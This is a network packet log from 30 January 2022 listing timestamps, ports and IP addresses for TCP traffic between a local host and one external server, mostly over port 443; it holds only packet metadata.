Jan 30, 2022 13:30:36.637562990 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.637577057 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.637614965 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.637648106 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.660612106 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.660655975 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.660792112 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.660813093 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.660826921 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.660878897 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.660952091 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.660989046 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.661031961 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.661046028 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.661067963 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.661111116 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.680639029 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.680687904 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.680819988 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.680860996 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.680885077 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.680973053 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.681009054 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.681058884 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.681076050 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.681091070 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.681261063 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.681438923 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.681473970 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.681528091 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.681541920 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.681588888 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.681597948 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.681920052 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.681955099 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.682003975 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.682018995 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.682054996 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.682065964 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.695147991 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.695183039 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.695312023 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.695352077 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.695377111 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.695415974 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.695585012 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.695621967 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.695673943 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.695688963 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.695722103 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.695756912 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.696036100 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.696070910 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.696135044 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.696147919 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.696186066 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.696317911 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.696460009 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.696496010 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.696691036 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.696705103 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.696717024 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.696778059 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.696883917 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.696919918 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.696971893 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.696985960 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.697041035 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.697079897 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.697242975 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.697277069 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.697360039 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.697372913 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.697478056 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.697485924 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.704591990 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.704643011 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.704761982 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.704801083 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.704828978 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.705013990 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.705049038 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.705074072 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.705086946 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.705101967 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.705117941 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.705143929 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.705401897 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.705436945 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.705487967 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.705502033 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.705518007 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.705600023 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.725204945 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.725253105 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.725316048 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.725331068 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.725348949 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.725394011 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.725436926 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.725472927 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.725518942 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.725532055 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.725548029 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.725641966 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.725899935 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.725935936 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.725984097 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.725996971 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.726017952 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.726054907 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.726290941 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.726325989 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.726376057 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.726388931 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.726403952 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.726747036 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.726779938 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.726821899 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.726833105 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.726847887 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.726886988 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.727174997 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.727210999 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.727256060 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.727269888 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.727283955 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.727360964 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.738780975 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.738815069 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.738953114 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.738996029 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.739021063 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.739083052 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.739315033 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.739350080 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.739501953 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.739517927 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.739568949 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.739602089 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.739753962 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.739790916 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.739850998 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.739870071 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.739916086 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.739958048 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.739969969 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.739990950 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:36.740061045 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:36.828224897 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:45.588998079 CET	49761	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:45.589039087 CET	443	49761	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.116184950 CET	49762	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.140032053 CET	32710	49762	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.140285969 CET	49762	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.144690990 CET	49762	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.210553885 CET	32710	49762	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.408647060 CET	32710	49762	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.408684969 CET	32710	49762	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.408775091 CET	49762	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.418657064 CET	49762	32710	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.430176020 CET	49763	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.430213928 CET	443	49763	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.430300951 CET	49763	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.430740118 CET	49763	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.430777073 CET	443	49763	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.430855036 CET	49763	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.442177057 CET	32710	49762	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.445566893 CET	49764	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.445624113 CET	443	49764	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.445800066 CET	49764	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.446449995 CET	49764	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.446472883 CET	443	49764	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.587439060 CET	443	49764	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.592000008 CET	49764	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.592485905 CET	49764	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.592504978 CET	443	49764	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.596772909 CET	49764	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.596791029 CET	443	49764	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.679012060 CET	443	49764	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.679056883 CET	443	49764	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.679141045 CET	443	49764	185.14.31.158	192.168.2.3
Jan 30, 2022 13:30:46.679353952 CET	49764	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.758033037 CET	49764	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:30:46.758078098 CET	443	49764	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:35.153176069 CET	49840	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:35.153220892 CET	443	49840	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:35.153318882 CET	49840	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:35.153611898 CET	49840	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:35.153695107 CET	443	49840	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:35.153767109 CET	49840	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:35.797806025 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:35.797867060 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:35.797955036 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.190299988 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.190354109 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.341434956 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.342341900 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.360060930 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.360095024 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.360675097 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.360764980 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.365847111 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.409893036 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.436202049 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.436256886 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.436350107 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.436384916 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.436427116 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.436440945 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.480679035 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.480731964 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.480896950 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.480941057 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.480962038 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.480993032 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.525103092 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.525154114 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.525336981 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.525378942 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.525444031 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.574774027 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.574830055 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.575043917 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.575083017 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.575149059 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.575151920 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.575180054 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.575205088 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.575221062 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.575262070 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.575278044 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.575293064 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.575324059 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.599746943 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.599798918 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.599890947 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.599910975 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.599927902 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.602926016 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.619215965 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.619266987 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.619493961 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.619533062 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.619601011 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.619798899 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.619841099 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.619880915 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.619899035 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.619919062 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.619952917 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.620306969 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.620342016 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.620382071 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.620398998 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.620424032 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.620452881 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.620760918 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.620800018 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.620841980 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.620863914 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.620883942 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.620920897 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.667104959 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.667155027 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.667388916 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.667412043 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.667438030 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.667464972 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.667491913 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.667541027 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.667560101 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.667829037 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.667869091 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.667917967 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.667949915 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.667969942 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.668009996 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.677333117 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.677385092 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.677537918 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.677560091 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.677620888 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.691931963 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.691982985 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.692152023 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.692168951 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.692197084 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.692222118 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.692241907 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.692279100 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.692291021 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.692306995 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.692341089 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.711677074 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.711730003 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.711885929 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.711905956 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.711958885 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.712420940 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.712460041 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.712502956 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.712518930 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.712536097 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.712565899 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.712888956 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.712944031 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.712985039 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.713001013 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.713016987 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.713053942 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.716202974 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.716242075 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.716309071 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.716326952 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.716351986 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.716859102 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.726695061 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.737062931 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.737106085 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.737165928 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.737204075 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.737227917 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.737469912 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.738089085 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.738126993 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.738171101 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.738188028 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.738215923 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.738243103 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.738480091 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.738518000 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.738553047 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.738570929 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.738600969 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.738624096 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.738878965 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.738914967 CET	443	49841	185.14.31.158	192.168.2.3
Jan 30, 2022 13:33:36.738955975 CET	49841	443	192.168.2.3	185.14.31.158
Jan 30, 2022 13:33:36.738972902 CET	443	49841	185.14.31.158	192.168.2.3
